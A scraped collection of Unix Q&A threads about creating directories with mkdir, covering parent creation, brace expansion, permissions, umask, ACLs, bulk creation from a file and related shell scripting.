mkdir -p will create a directory; it will also make parent directories as needed. Does a similar command exist for files, that will create a file and parent directories as needed?
mkdir -p for files
mkdir -p will not give you an error if the directory already exists, and the contents of the directory will not change. See the manual entry for mkdir.
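A quick demonstration of that behaviour:
$ mkdir -p demo
$ touch demo/somefile
$ mkdir -p demo; echo "exit status: $?"
exit status: 0
$ ls demo
somefile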
Say I have a folder: ./folder/ Inside it there are many files and even sub-directories. When I execute mkdir -p folder I won't see any errors or even warnings. So I just want to confirm: is anything lost or changed as a result of this command?
Is mkdir -p totally safe when the folder being created already exists?
mkdir accepts multiple path arguments: mkdir -p -- a/foo b/bar a/baz
How can I create multiple nested directories in one command? mkdir -p /just/one/dirBut I need to create multiple different nested directories...
Creating multiple nested directories with one command
You can use the perl rename utility (aka prename or file-rename) to rename the directories. NOTE: This is not to be confused with rename from util-linux, or any other version. rename -n 's/([[:cntrl:]])/ord($1)/eg' run_*/This uses perl's ord() function to replace each control-character in the filename with the ordinal number for that character. e.g ^A becomes 1, ^B becomes 2, etc. The -n option is for a dry-run to show what rename would do if you let it. Remove it (or replace it with -v for verbose output) to actually rename. The e modifier in the s/LHS/RHS/eg operation causes perl to execute the RHS (the replacement) as perl code, and the $1 is the matched data (the control character) from the LHS. If you want zero-padded numbers in the filenames, you could combine ord() with sprintf(). e.g. $ rename -n 's/([[:cntrl:]])/sprintf("%02i",ord($1))/eg' run_*/ | sed -n l rename(run_\001, run_01)$ rename(run_\002, run_02)$ rename(run_\003, run_03)$ rename(run_\004, run_04)$ rename(run_\005, run_05)$ rename(run_\006, run_06)$ rename(run_\a, run_07)$ rename(run_\b, run_08)$ rename(run_\t, run_09)$The above examples work if and only if sp.run_number in your matlab script was in the range of 0..26 (so it produced control-characters in the directory names). To deal with ANY 1-byte character (i.e. from 0..255), you'd use: rename -n 's/run_(.)/sprintf("run_%03i",ord($1))/e' run_*/If sp.run_number could be > 255, you'd have to use perl's unpack() function instead of ord(). I don't know exactly how matlab outputs an unconverted int in a string, so you'll have to experiment. See perldoc -f unpack for details. e.g. the following will unpack both 8-bit and 16-bit unsigned values and zero-pad them to 5 digits wide: rename -n 's/run_(.*)/sprintf("run_%05i",unpack("SC",$1))/e' run_*/
Sorry if this has an answer elsewhere, I've no idea how to search for my problem. I was running some simulations on a redhat linux HPC server, and my code for handling the folder structure to save the output had an unfortunate bug. My matlab code to create the folder was: folder = [sp.saveLocation, 'run_', sp.run_number, '/'];where sp.run_number was an integer. I forgot to convert it to a string, but for some reason running mkdir(folder); (in matlab) still succeeded. In fact, the simulations ran without a hitch, and the data got saved to the matching directory. Now, when the folder structure is queried/printed I get the following situations:When I try to tab autocomplete: run_ run_^A/ run_^B/ run_^C/ run_^D/ run_^E/ run_^F/ run_^G/ run_^H/ run_^I/ When I use ls: run_ run_? run_? run_? run_? run_? run_? run_? run_? run_? run_?. When I transfer to my mac using rsync the --progress option shows: run_\#003/ etc. with (I assume) the number matching the integer in sp.run_number padded to three digits, so the 10th run is run_\#010/ When I view the folders in finder I see run_ run_ run_ run_ run_ run_ run_ run_ run_ run_? Looking at this question and using the command ls | LC_ALL=C sed -n l I get: run_$ run_\001$ run_\002$ run_\003$ run_\004$ run_\005$ run_\006$ run_\a$ run_\b$ run_\t$ run_$I can't manage to cd into the folders using any of these representations. I have thousands of these folders, so I'll need to fix this with a script. Which of these options is the correct representation of the folder? How can I programmatically refer to these folders so I rename them with a properly formatted name using a bash script? And I guess for the sake of curiosity, how in the hell did this happen in the first place?
Why did my folder names end up like this, and how can I fix this using a script?
The limit will be the number of inodes on your partition since directories, like regular files, take an inode each. Nothing would stop you from creating a directory inside a directory inside another directory and so on until you run out of inodes. Note that the shell's command line does have a maximum length which can cause issues with really long paths, but it would still be possible to cd progressively towards the target file.
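Two hedged illustrations: checking the inode budget, and showing that deep nesting itself is not a problem (100 levels here, well under the usual 4096-byte path limit):
df -i                                        # total, used and free inodes per filesystem
mkdir -p "$(printf 'level/%.0s' {1..100})"   # creates a 100-level-deep directory chain (remove with rm -r level)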
I'm curious, how many folders can be nested, and why? Is there a limit? What I mean by nested is when folders are in this structure: folder |_ folder |_ folder |_ folder |_ ...Not like this: folder |_ folder |_ folder |_ folder |_ ...If there is a limit, is it set by the operating system, or by the file system?
How many directories can be nested?
Try: for x in {a..z} ; do mkdir -p $x/${x}{a..z} ; doneBash will expand XXX{a..z} out to XXXa, XXXb, and so on. There's no need for the inner loop you have. After that: $ ls a b c d e f g h i j k l m n o p q r s t u v w x y z $ ls m ma mc me mg mi mk mm mo mq ms mu mw my mb md mf mh mj ml mn mp mr mt mv mx mz
I want to create directories labelled from a to z. Inside each of these directories, I need to create sub-directories labelled aa, ab, etc. So, for instance, for the directory m, my sub-directories will be labelled ma, mb, up to mz.
Recursively create directories for all letters
Try this:
cd /source/dir/path
find . -type d -exec mkdir -p -- /destination/directory/{} \;
-type d lists directories under the current path recursively; mkdir -p -- /destination/directory/{} creates each of them at the destination. This relies on a find that supports expanding {} in the middle of an argument word.
I have a directory foo with subdirectories. I wish to create the same subdirectory names in another directory without copying their content. How do I do this? Is there a way to get ls output as a brace expansion list?
Create the same subfolders in another folder
/tmp can be considered as a typical directory in most cases. You can recreate it, give it to root (chown root:root /tmp) and set 1777 permissions on it so that everyone can use it (chmod 1777 /tmp). This operation will be even more important if your /tmp is on a separate partition (which makes it a mount point). By the way, since many programs rely on temporary files, I would recommend a reboot to ensure that all programs resume as usual. Even if most programs are designed to handle these situations properly, some may not.
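A hedged recap of the recovery plus a quick verification (the stat format specifiers are GNU coreutils):
sudo mkdir /tmp
sudo chown root:root /tmp
sudo chmod 1777 /tmp
stat -c '%a %U:%G' /tmp   # expect: 1777 root:root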
Accidentally, I ran sudo rm -r /tmp. Is that a problem? I recreated it using sudo mkdir /tmp. Does that fix the problem? After I recreated the directory, in the Places section in the sidebar in Nautilus in Ubuntu 14.04 I can see /tmp, which wasn't there before. Is that a problem? One last thing: do I have to run sudo chown $USER:$USER /tmp to make it accessible as it was before? Would there be any side-effects after this? By the way, I get this seemingly-related error when I try to use bash autocompletion: bash: cannot create temp file for here-document: Permission denied
Deleted /tmp accidently
The new folder is not created until you actually provide a name, normally by typing something in what looks like a directory/folder name in the currently open directory/folder in the file manager. Once you enter that name and press Return, the actual call to mkdir() is executed (not the mkdir command-line command). And if you directly press Enter you often get some default name. Pressing Ctrl+Shift+N merely triggers the routine that creates the box where you enter the name for the new folder, and that sets the whole thing rolling.
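If you want to see that syscall for yourself, a hedged sketch (Thunar as the example from the question; some file managers delegate folder creation to a helper daemon such as gvfsd, in which case nothing shows up under the traced process):
strace -f -e trace=mkdir,mkdirat thunar 2>&1 | grep mkdir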
In many file managers there is a shortcut key to create a new folder. In Nautilus, Thunar and Pantheon Files this is Ctrl+Shift+N; in Dolphin it is F10. How does this shortcut work? I imagine that behind it there's a mkdir command, but that would need a path (like discussed here). I can imagine that, with the file manager open at a certain location, using the shortcut triggers the needed command: is this what happens? What command is that? Can a custom shortcut be used for the same purpose?
How does the 'Create New Folder' shortcut key work?
Keep in mind that there is more than one implementation of mv. The mv you use on Linux is not from the exact same source as the one on OSX or Solaris, etc. But it is desirable for them all to behave in the same way -- this is the point of standards. It's conceivable that a mv implementation could add an option for this purpose, although since it is so simple to deal with, it would probably not be worthwhile, because the very minor benefit is outweighed by a more significant negative consequence: code written to exploit such a non-standard option of one implementation would not be portable to, or behave consistently on, another system using a standard implementation. mv is standardized by POSIX and this explicitly ties its behavior to the rename() system call. In ISO C the behavior of rename() is not very specific and much is left up to the implementation, but under POSIX you'll note the potential ENOENT error, indicating "a component of the path prefix of new does not exist", describing the behavior to be expected in explicit terms. This is better than ambiguity and leaving such details up to the implementation, because doing the latter hurts portability. In defense of the design, in a scripting context it's probably better to fail by default on an invalid target path than to assume it just needs to be created. This is because the path itself may often come from user input or configuration and may include a typo; in this case the script should fail at that point and indicate to the user that they've entered an invalid path. There is of course the option for the person who wrote the code to implement different behavior and create directories that don't exist, but it is better that you are responsible for doing that than the opposite (being responsible for ensuring a mv call won't create previously non-existent directories).
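If you want that opt-in behaviour, a minimal hedged sketch of a shell wrapper (the name mvp is made up, and it assumes the destination argument includes the final file name):
mvp() {
    mkdir -p -- "$(dirname -- "$2")" && mv -- "$1" "$2"
}
mvp somefile.txt /path/that/does/not/exist/yet/somefile.txt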
This question asks for the best way to create a directory when using mv if it doesn't exist. My question is why isn't this an inbuilt feature of mv? Is there some fundamental reason due to which this would not be a good idea?
Will `mv` ever have the ability to create directories?
t is not "temporary", it means that the sticky bit is set. From man ls:t [means that the] sticky bit is set (mode 1000), and is searchable or executable. (See chmod(1) or sticky(8).)The sticky bit is set here because you set decimal 777 (octal 1411), not octal 777 (decimal 511). You need to write 0777 to use octal, not 777. You should also note that the ultimate effect of the mode argument to mkdir also involves ANDing against your umask. From man 2 mkdir:The argument mode specifies the permissions to use. It is modified by the process's umask in the usual way: the permissions of the created directory are (mode & ~umask & 0777).I would suggest that if this affects you, you chmod after mkdir instead of using the mode argument. A final word of warning: mode 777 is almost never what you really want to do. Instead of opening up the directory globally to all users, consider setting a proper mode and owner/group on the directory. If you need more complicated rules, consider using ACLs.
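You can see the decimal/octal mix-up directly from the shell, since printf treats a leading 0 as an octal constant the same way C does:
$ printf '%o\n' 777    # the decimal number 777, shown in octal: sticky bit plus very odd permissions
1411
$ printf '%d\n' 0777   # the octal constant 0777, shown in decimal
511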
I have a strange issue with directory permissions. From within a C++ app, I create a folder with: mkdir( "foldername", 777 ); But I ran into an issue when attempting to create a file in that folder: fopen() returned NULL, and errno told me Permission denied. So I checked, and indeed, I had the following permissions on the folder that got created: dr----x--t (The root folder has drwxrwxr-x) I checked, and this unusual t means "temporary", but I have no clue what that means. chmod 777 foldername from the shell does the job and sets the attributes to drwxrwxrwx, but I can't do it manually each time. Question: any clue what is going on? Why doesn't my app correctly set the folder's attributes? What is the meaning of this 'temporary' attribute? (The system is Ubuntu 12.04.)
Issue on created folder permissions: temporary flag
AFAIK, there is nothing standard like that, but you can do it yourself:
ptouch() {
  for p do
    _dir="$(dirname -- "$p")"
    mkdir -p -- "$_dir" && touch -- "$p"
  done
}
Then you can do:
ptouch /path/to/directory/file1 /path/to/directory/file2 ...
I am aware of the fact that mkdir -p /path/to/new/directory will create a new directory, along with its parent directories (if needed). If I have to create a new file along with its parent directories (where some or all of the parent directories are not present), I could use mkdir -p /path/to/directory && touch /path/to/directory/NEWFILE. But is there any other command to achieve this?
Make parent directories while creating a new file
The problem is that rsync is trying to create directories on an NTFS partition with illegal characters. From Naming Conventions:
Use any character in the current code page for a name, including Unicode characters and characters in the extended character set (128–255), except for the following reserved characters: < (less than), > (greater than), : (colon), " (double quote), / (forward slash), \ (backslash), | (vertical bar or pipe), ? (question mark), * (asterisk)
Also:
Do not end a file or directory name with a space or a period. Although the underlying file system may support such names, the Windows shell and user interface does not. However, it is acceptable to specify a period as the first character of a name. For example, ".temp".
Your failed directories either contain illegal characters or end with a period.
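A hedged way to list the offending names on the source before syncing (the bracket class covers most, but not all, of the reserved characters above):
find /dir1 \( -name '*.' -o -name '* ' -o -name '*[<>:"|?*]*' \) -print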
I tried to synchronize /dir1 (ext4) and /dir2 (ntfs) using rsync -azP, but got these errors: rsync: recv_generator: mkdir "dir2/X.Y." failed: Invalid argument (22) rsync: recv_generator: mkdir "dir2/CATSNDOGS\#123.11." failed: Invalid argument (22) Note that the directories X.Y. and CATSNDOGS #123.11. are created by another party and, named as they are, downloaded (using a Python script) to /dir1. I can't cd into these directories and ls -d doesn't list them. On the other hand, the GUI-based Nautilus shows both them and the content inside them perfectly.
Synchronizing with rsync outputs error "Invalid argument (22)" for directories with dots and other symbols in their name
I talked to the infrastructure people, and the answer is that there are extended ACLs in place that act differently based on location, and that they were erroneously set.
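For anyone hitting something similar, a hedged sketch of how to inspect and clear POSIX ACLs (since the home directory here is on NFS, NFSv4 ACLs may instead need nfs4_getfacl/nfs4_setfacl from nfs4-acl-tools):
getfacl ~        # access ACL entries on the home directory
getfacl -d ~     # default (inherited) ACL entries
setfacl -b ~     # remove all extended ACL entries, leaving only the plain mode bits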
Whenever I create new directories in my home (or its subdirectories) they do not have write permission, even though umask is set correctly. Files I make DO have write permission.
[mmanary@seqap33 ~]$ umask
0002
[mmanary@seqap33 ~]$ mkdir testDir
[mmanary@seqap33 ~]$ touch testFile
[mmanary@seqap33 ~]$ ls -l
dr-xr-x--- 2 mmanary mmanary 0 Apr 15 10:25 testDir
-rw-rw-r-- 1 mmanary mmanary 0 Apr 15 10:26 testFile
If I switch to a shared group storage directory, then new directories DO have write permission. I can fix them with chmod easily, BUT when using tar, the new directory cannot be written into, so the tar fails with "Permission Denied". Any help is appreciated. Edit: I have read other suggested questions, but they do not seem to apply directly because they involve more complicated cases (other users involved). In case this helps:
[mmanary@seqap33 ~]$ getfacl .
# file: .
# owner: mmanary
# group: mmanary
user::rwx
group::r-x
other::---
Edit2: On advice from comments: my filesystem is NFS
mkdir permissions do not correspond to umask (change depending on location)
A wildcard always expands to existing names. Your command mkdir * fails because the names that * expands to already exist. Your command mkdir *.d "fails" because *.d does not match any existing names. The pattern is therefore left unexpanded by default1 and a directory called *.d is created. You may remove this with rmdir '*.d'. To create a directory for each regular file in the current directory, so that the new directories have the same name as the files, but with a .d suffix:
for name in ./*; do
    if [ -f "$name" ]; then
        # this is a regular file (or a symlink to one), create directory
        mkdir "$name.d"
    fi
done
or, for people that like "one-liners",
for n in ./*; do [ -f "$n" ] && mkdir "$n.d"; done
In bash, you could also do
names=( ./* )
mkdir "${names[@]/%/.d}"
but this makes no checks for whether the things that the glob expands to are regular files or something else. The initial ./ in the commands above is to protect against filenames that start with a dash (-); the dash and the characters following it would otherwise be interpreted as options to mkdir.
1 Some shells have a nullglob shell option that causes non-matched shell wildcards to be expanded to an empty string. In bash this is enabled using shopt -s nullglob.
I'm trying to make a directory for each file in a directory. mkdir * returns File exists. So I try mkdir *.d and it makes a directory called "*.d". How do I force the wildcard to expand?
Bash wildcard not expanding
With brace expansion:
mkdir gallery{1..50}
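If you want names that sort cleanly in ls, bash 4 and later also accept a zero-padded range:
mkdir gallery{01..50}   # gallery01 ... gallery50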
In my scenario, I have some photos and I want to keep them separate. At present, I am doing mkdir gallery1 gallery2 gallery3 gallery4 gallery5 gallery6, but this is a pain. I think we can do it more easily. Suppose I want to make directories from gallery7 to gallery50. How would I do that?
How to create directory ranging from 1 to nth?
The echo always succeeds, so your if condition is true even when mkdir fails. Do without the echo and the subshell:
#!/bin/bash
echo "enter the directory name"
read ab
check(){
if mkdir "$ab" 2>/dev/null; then
    echo "directory created "
    ls -ld "$ab"
    exit
else
    echo "try again "
    echo "enter new value for directory: "
    read ab
    check
fi
}
check
I was trying to execute a program which will create a directory on the basis of a complete path provided to it from the prompt and, if the directory already exists, it will return an error (for "directory already exists") and ask again for the name in a recursive function. Here is what I tried; let us say a file, test1, with this in it:
#!/bin/bash
echo "enter the directory name"
read ab
check(){
if (( echo `mkdir $ab` 2>/dev/null )); then
    echo "directory created "
    echo `ls -ld $ab`
    exit
else
    echo "try again "
    echo "enter new value for directory:"
    read ab
    check
fi
}
check
The problem here is: if the directory exists then the program works fine, but if it does not exist then it creates it but then goes to the else part of the program.
Executing a command within `if` statement and on success perform further steps
The group varies when creating subdir:
drwxrwx---+ 28 admin sftponly 4.0K Oct 22 15:19 ..
dr-xrwx---+ 2 admin *users* 4.0K Oct 22 22:41 subdir
Nested directory creation is possibly restricted because subdir ends up with a different group (users instead of sftponly).
I am using sftp with the internal-sftp for debian. What I'm trying to acomplish is to jail all users to a specific folder which is working fine. I also need to have a single user that has "admin" rights on sftp but is not a root user. The admin user will be putting files in the sftp users directories, so they will be able to access them. The admin user will be a "non-technical" person using winscp or other client to do stuff. There is no way I can force him to use bash. I came up with the following solution:SFTP configurationUsing sshd_config I set up this: Match group users ChrootDirectory /home X11Forwarding no AllowTcpForwarding no ForceCommand internal-sftp -d %uMatch group sftponly ChrootDirectory /home X11Forwarding no AllowTcpForwarding no ForceCommand internal-sftp -d admin/sftp/%uSo my 'admin' user has all the sftp users in his home. 'admin' is also in the users group. all other users are created in the sftponly group. 'admin' is also in the sftponly group.Directory setupThe directory setup is as follows: -/ -home -admin -sftp -user1 -user2I created a script for creating the sftp users that perform the following:add user $U: useradd -d / -g 1000 -M -N -s /usr/sbin/nologin $Uset user $U password echo "$U:$P" | chpasswdcreate directory /home/admin/sftp/$U mkdir $SFTP_PATH/$Uset ownership chown $U:sftponly $SFTP_PATH/$Uset permissions chmod u=rx,go= -R $SFTP_PATH/$U chmod g+s $SFTP_PATH/$USetup ACL setfacl -Rm u:admin:rwx,u:$U:r-x,g::--- $SFTP_PATH/$U setfacl -d -Rm u:admin:rwx,u:$U:r-x,g::--- $SFTP_PATH/$USo far so good. Now what I wan't to have in point 6 is a setup that will allow the user admin to create a subdirectory in the $SFTP_PATH/$U that will be accessible to the $U itself. This works fine for the first directory created (user tester): # pwd /home/admin/sftp/tester # ls -alh dr-xrwx---+ 2 tester sftponly 4.0K Oct 22 16:06 tester # su admin $ cd /home/admin/sftp/tester $ mkdir subdir $ ls -alh admin@server:/home/admin/sftp/tester$ ls -alh total 20K dr-xrwx---+ 3 tester sftponly 4.0K Oct 22 22:41 . drwxrwx---+ 28 admin sftponly 4.0K Oct 22 15:19 .. dr-xrwx---+ 2 admin users 4.0K Oct 22 22:41 subdir $ cd subdir admin@storage:/home/admin/sftp/tester/subdir$ mkdir nesteddir mkdir: cannot create directory ‘nesteddir’: Permission deniedWhen I test the acl i get: admin@storage:/home/admin/sftp/tester$ getfacl subdir/ # file: subdir/ # owner: admin # group: users user::r-x user:admin:rwx user:tester:r-x group::--- mask::rwx other::--- default:user::r-x default:user:admin:rwx default:user:tester:r-x default:group::--- default:mask::rwx default:other::---So my question is: Being admin and having setfacl for admin as rwx, why can I create the directory subdir but cannot create the directory nested? Is there something I am missing here? I know of proftpd and pureftp but if possible I would like to use the ssh way. If there is no way to do this this way I would appreciate to point me in the right direction and recommend software that would be able to achieve this setup out of the box. Please note: user admin has his own directory under /home/admin/sharedfiles/, where he stores files that are then shared with the sftp users. The files are shared using hard links in their folders. For example if admin wants to share a file (the files are very big like 500GB) with 3 users he just puts hardlinks in their folders to those files and the can download them without having to copy the big files to the folder of each user. 
The issue occurred when admin wanted to put different categories of shares in different folders for the users. EDIT: I noticed that if I change the ownership of the newly created folder to 'tester' - then creating nested directories is possible for the admin user. However I still have to change the ownership of the nested directory to allow for further directory nesting. # chown tester:sftponly subdir # su admin $ cd /home/admin/sftp/tester/subdir $ mkdir nested # <----- works fine $ cd nested $ mkdir deepdir mkdir: cannot create directory ‘deepdir’: Permission deniedSo if I want to create the next nested directory then I have to chown tester:sftponly nested and then as user admin I can create the deepdir directory. Please note that the ACL is inherited and theoretically user admin has rwx permissions to all files and directories under the first folder, that is subdir. Maybe this will help in finding the reason for the failing setfacl?
Why does default setfacl fail for nested directories?
The -f in your test is checking if FILE exists and is a regular file. What you need is -d to test if FILE exists and is a directory. if [ ! -d "$DIR/0folder" ] then mkdir "$DIR/0folder" fiIt is not mandatory to check if a directory exists though. According to the man page of mkdir we see the following man mkdir | grep -A1 -- -p -p, --parents no error if existing, make parent directories as neededHowever, if FILE exists and is a regular file mkdir -p will fail with mkdir: /Allfoldersgoeshere/subfolder/0folder': Not a directory. In this scenario handling the file that is expected to be a directory will be necessary before directory creation.
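As a minimal sketch of that last scenario (the backup name used here is an arbitrary choice, not anything mandated by mkdir):
#!/bin/sh
dir="$DIR/0folder"
if [ -e "$dir" ] && [ ! -d "$dir" ]; then
    # Something other than a directory occupies the name; move it aside first
    mv -- "$dir" "$dir.bak"
fi
mkdir -p -- "$dir"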
I have a folder which contains some folders, these folder are moved very often so I made a script to see if they exist, and if not then create them. This is what I did to (which I though would) achieve it: if [ ! -f "$DIR/0folder" ] then mkdir "$DIR/0folder" fiBut, even if 0folder already exists, it still tries to make it which mkdir tells me. Like here; mkdir: /Allfoldersgoeshere/subfolder/0folder: File existsWhy? It should just ignore it because it already exists?
Script tries to create files even though it shouldn't have to?
With zsh: dirs=(*(/)) mkdir -- $^dirs/doc touch -- $^dirs/doc/doc1.txt(/) is a globbing qualifier, / means to select only directories. $^array (reminiscent of rc's ^ operator) is to turn on a brace-like type of expansion on the array, so $^array/doc is like {elt1,elt2,elt3}/doc (where elt1, elt2, elt3 are the elements of the array). One could also do: mkdir -- *(/e:REPLY+=/doc:) touch -- */doc(/e:REPLY+=/doc1.txt:)Where e is another globbing qualifier that executes some given code on the file to select. With rc/es/akanga: dirs = */ mkdir -- $dirs^doc touch -- $dirs^doc/doc1.txtThat's using the ^ operator which is like an enhanced concatenation operator. rc doesn't support globbing qualifiers (which is a zsh-only feature). */ expands to all the directories and symlinks to directories, with / appended. With tcsh: set dirs = */ mkdir -- $dirs:gs:/:/doc::q touch -- $dirs:gs:/:/doc/doc1.txt::qThe :x are history modifiers that can also be applied to variable expansions. :gs is for global substitute. :q quotes the words to avoid problems with some characters. With zsh or bash: dirs=(*/) mkdir -- "${dirs[@]/%/doc}" touch -- "${dirs[@]/%/doc/doc1.txt}"${var/pattern/replace} is the substitute operator in Korn-like shells. With ${array[@]/pattern/replace}, it's applied to each element of the array. % there means at the end. Various considerations: dirs=(*/) includes directories and symlinks to directories (and there's no way to exclude symlinks other than using [ -L "$file" ] in a loop), while dir=(*(/)) (zsh extension) only includes directories (dir=(*(-/)) to include symlinks to directories without adding the trailing slash). They exclude hidden dirs. Each shell has specific option to include hidden files). If the current directory is writable by others, you potentially have security problems. As one could create a symlink there to cause you to create dirs or files where you would not want to. Even with solutions that don't consider symlinks, there's still a race condition as one may be able to replace a directory with a symlink in between the dirs=(*/) and the mkdir....
Suppose I have a directory /, and it contains many directories /mydir, /hisdir, /herdir, and each of those need to have a similar structure. For each directory in /, there needs to be a directory doc and within it a file doc1.txt. One might naively assume they could execute mkdir */doc touch */doc/doc1.txtbut they would be wrong, because wildcards don't work like that. Is there a way to do this without just making the structure once in an example then cping it to the others? And, if not, is there a way to do the above workaround without overwriting any existing files (suppose mydir already contains the structure with some data I want to keep)? EDIT: I'd also like to avoid using a script if possible.
Make many subdirectories at once
Add this to your .bashrc: mdcd() { mkdir "$@" && cd "$@" }Log out and log in again, start a new shell, or run source ~/.bashrc to make the change take effect.
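If you also want to pass options such as -p, a slightly more defensive sketch (not part of the original answer) creates the directories and then changes into the last argument only:
mdcd() {
    # "${@: -1}" is the last positional parameter in bash; the space before -1 matters
    mkdir "$@" && cd -- "${@: -1}"
}
Used as mdcd -p projects/2024/logs it ends up inside projects/2024/logs.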
Quite often I need to perform this two commands: mkdir abc cd abcI am curious whether there is a simple command (or an alias that I can create and use) to do it in one go, like user@GROUP:~$ mdcd abc user@GROUP:~/abc$Is this possible?
Command for creating a directory and navigating into it directly? [duplicate]
With GNU xargs: xargs -d '\n' mkdir -p -- < foo.txtxargs will run as few mkdir commands as possible. With standard syntax: (export LC_ALL=C; sed 's/[[:blank:]"\'\'']/\\&/g' < foo.txt | xargs mkdir -p --)Where it's not efficient is that mkdir -p a/b/c will attempt some mkdir("a") and possibly stat("a") and chdir("a") and same for "a/b" even if "a/b" existed beforehand. If your foo.txt has: a a/b a/b/cin that order, that is, if for each path there has been a line for each of the path components before, then you can omit the -p and it will be significantly more efficient. Or alternatively: perl -lne 'mkdir $_ or warn "$_: $!\n"' < foo.txtWhich avoids invoking a mkdir command (or many of them) altogether.
I have a text file, "foo.txt", that specifies a directory in each line: data/bar/foo data/bar/foo/chum data/bar/chum/foo ...There could be millions of directories and subdirectories What is the quickest way to create all the directories in bulk, using a terminal command ? By quickest, I mean quickest to create all the directories. Since there are millions of directories there are many write operations. I am using ubuntu 12.04. EDIT: Keep in mind, the list may not fit in memory, since there are MILLIONS of lines, each representing a directory. EDIT: My file has 4.5 million lines, each representing a directory, composed of alphanumeric characters, the path separator "/" , and possibly "../" When I ran xargs -d '\n' mkdir -p < foo.txt after a while it kept printing errors until i did ctrl + c: mkdir: cannot create directory `../myData/data/a/m/e/d': No space left on device But running df -h gives the following output: Filesystem Size Used Avail Use% Mounted on /dev/xvda 48G 20G 28G 42% / devtmpfs 2.0G 4.0K 2.0G 1% /dev none 401M 164K 401M 1% /run none 5.0M 0 5.0M 0% /run/lock none 2.0G 0 2.0G 0% /run/shmfree -m total used free shared buffers cached Mem: 4002 3743 258 0 2870 13 -/+ buffers/cache: 859 3143 Swap: 255 26 229EDIT: df -i Filesystem Inodes IUsed IFree IUse% Mounted on /dev/xvda 2872640 1878464 994176 66% / devtmpfs 512053 1388 510665 1% /dev none 512347 775 511572 1% /run none 512347 1 512346 1% /run/lock none 512347 1 512346 1% /run/shmdf -T Filesystem Type 1K-blocks Used Available Use% Mounted on /dev/xvda ext4 49315312 11447636 37350680 24% / devtmpfs devtmpfs 2048212 4 2048208 1% /dev none tmpfs 409880 164 409716 1% /run none tmpfs 5120 0 5120 0% /run/lock none tmpfs 2049388 0 2049388 0% /run/shmEDIT: I increased the number of inodes, and reduced the depth of my directories, and it seemed to work. It took 2m16seconds this time round.
What is the fastest way to create a list of directories specified in a file?
As thrig pointed out, all that's needed is to create the directory structure that you want under /etc/skel. Quoting from the useradd man page-k, --skel SKEL_DIR The skeleton directory, which contains files and directories to be copied in the user's home directory, when the home directory is created by useradd. This option is only valid if the -m (or --create-home) option is specified. If this option is not set, the skeleton directory is defined by the SKEL variable in /etc/default/useradd or, by default, /etc/skel.... and the default SKEL variable in /etc/default/useradd is /etc/skel.
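For example (the directory names here are just placeholders):
# Add the wanted structure to the skeleton
sudo mkdir -p /etc/skel/Documents /etc/skel/projects/bin
# Any user created with a new home directory now gets a copy of it
sudo useradd -m newuser
ls /home/newuser        # shows Documents and projects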
I want to add a few directories to the skeleton directory. When I add a new user, I want my own directories to be added to the new home directory.
Skeleton directory - how to add my own directories
First of all, don't make your script read input at runtime. That is hard to use for your users since typos are inevitable and hard to fix, and also means the task cannot be easily repeated and automated. Instead, take the name and number as command line parameters. Next, it is bad coding style to use CAPS for local shell variable names since by convention, the global environment variables are capitalized and this can lead to unexpected naming collisions and hard to debug issues. Now, your real problem here is that you are using $((foo)) which means "treat foo as a mathematical expression and return its result". For example: $ echo $((4 + 3 )) 7Of course, the entire script doesn't really make sense either since you cannot create multiple files or directories with the same name. Perhaps you meant to add a counter? Maybe something like this: #!/bin/bashfolderName="$1" folderNumber="$2"for((i=1; i<=$folderNumber; i++)); do mkdir -p "$folderName"_$i doneWhich you execute like this: foo.sh bar 4And would result in: $ ls bar_1 bar_2 bar_3 bar_4If you want the first directory created not to have a suffix, you could do: #!/bin/bashfolderName="$1" folderNumber="$2"mkdir -p "$folderName" for((i=2; i<=$folderNumber; i++)); do mkdir -p "$folderName"_$i doneWhich results in: $ foo.sh bar 4 $ ls bar bar_2 bar_3 bar_4
The user will be asked 2 variables which will be the name of the folder and the number of folder they want to create. So if a user inputs sea and 3, the output should be: sea, sea2, sea3 read -p "Enter the name of the folder: " NAMEFOLDER read -p "How many copies of this folder do you want?: " NUMFOLDERi=0until [ $i -gt $NUMFOLDER ]do mkdir $(($NAMEFOLDER)) ((i=i+1)) donethen I am met with this problem "mkdir: cannot create directory ‘0’: File exists"I am stuck at this.
How to create folders using user input for the name and number
If you expressly list the directories, parent first, you can achieve your stated aim of creating the directories in one command: mkdir -m 555 -p a a/b a/b/cWith shells with support for csh-style brace expansion such as bash you can simplify this a little at the expense of readability: mkdir -m 555 -p a{,/b{,/c}}Notice, however, that for permissions 555 both commands will fail if it actually needs to create any of the parent directories: such directories are created with permissions that do not allow writing, and therefore next level directories cannot be created. Finally, a bash shell script that will also give you the functionality to create the multiple directories in one command as requested, by wrapping the complexity in a function. This one will attempt to apply the permissions to newly created directories from the bottom up, so it will be possible to end up with directories that have no write permission: mkdirs() { local dirs=() modes=() dir old # Grab arguments [[ "$1" == '-m' ]] && modes=('-m' "$2") && shift 2 dir=$1 # Identify missing directories while [[ "$dir" != "$old" ]] do [[ ! -d "$dir" ]] && dirs+=("$dir") old="$dir" dir="${dir%/*}" done # Create necessary directories and maybe fix up permissions for dir in "${dirs[@]}" do mkdir -p "${modes[@]}" "$dir" || return 1 [[ -n "${modes[1]}" ]] && chmod "${modes[1]}" "$dir" done }Example mkdirs -m 555 a/b/cls -ld a a/b a/b/c dr-xr-xr-x+ 1 roaima roaima 0 Jan 7 10:01 a dr-xr-xr-x+ 1 roaima roaima 0 Jan 7 10:01 a/b dr-xr-xr-x+ 1 roaima roaima 0 Jan 7 10:01 a/b/cAs always, this function can be put standalone into an executable script that's somewhere in your $PATH: #!/bin/bash mkdirs() { ...as above... }mkdirs "$@"
In Linux the following two commands work as expected: mkdir -m 555 new_directory mkdir -p a/b/cBut the following does not work as expected: mkdir -m 555 -p a/b/cthe 3 directories are created but only the latest recieves the 555 permission. The a and b directories have the default permissions. So how accomplish the goal described in the title? Is it possible? BTW - I selected 555 how a random case, it fails with 666 and 777 too
How create many nested directories and defining the permission to all them in one command?
Generally speaking, ${pkgs.nameOfPackage} is the preferred syntax. For your specific example, mkdir is part of the coreutils package; which (pun intended) you can determine with the command readlink $(which mkdir). So your line should read: ExecStartPre=${pkgs.coreutils}/bin/mkdir BLAH BLAH BLAHWhile coreutils is always installed AFAIK, a nice benefit of the ${pkgs.nameOfPackage} syntax is that you don't need to install the package nameOfPackage; Nix will pull it in for you.
